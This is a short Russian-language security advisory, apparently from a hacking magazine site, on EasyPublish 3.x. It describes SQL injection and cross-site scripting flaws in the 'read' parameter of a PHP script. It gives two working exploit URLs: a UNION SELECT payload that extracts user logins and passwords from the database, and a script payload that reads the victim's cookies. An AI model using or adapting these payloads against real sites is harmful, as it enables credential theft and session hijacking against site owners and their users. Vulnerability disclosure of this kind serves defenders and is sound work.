Хакер #305. Многошаговые SQL-инъекции
Программа: EasyPublish 3.x
Уязвимость позволяет удаленному пользователю осуществить XSS нападение и
выполнить произвольные SQL команды в базе данных приложения.
1) Уязвимость существует из-за недостаточной обработки входных данных в
параметре "read" сценарием staticpages/easypublish/index.php. Удаленный
пользователь может с помощью специально сформированного запроса выполнить
произвольные SQL команды в базе данных приложения.
Эксплоит:
http://Example/staticpages/easypublish/index.php?PageSection=0&table=edp_News&
page=individual&fage=search&read=1+union+all+select+1,concat(0x4c6f67696e3a,
puUsername,0x3c656e64757365723e,0x0d0a50617373776f72643a,
puPassword,0x3c656e64706173733e),3,4,1,5+FROM+edp_puusers/*;--
2) Уязвимость существует из-за недостаточной обработки входных данных в
параметре "read" сценарием staticpages/easypublish/index.php. Атакующий может
выполнить произвольный сценарий в браузере жертвы в контексте безопасности
уязвимого сайта.
Эксплоит:
http://Example//staticpages/easypublish/index.php?PageSection=0 &page=individual&table=edp_News&read=%<script>alert(document.cookie);</script>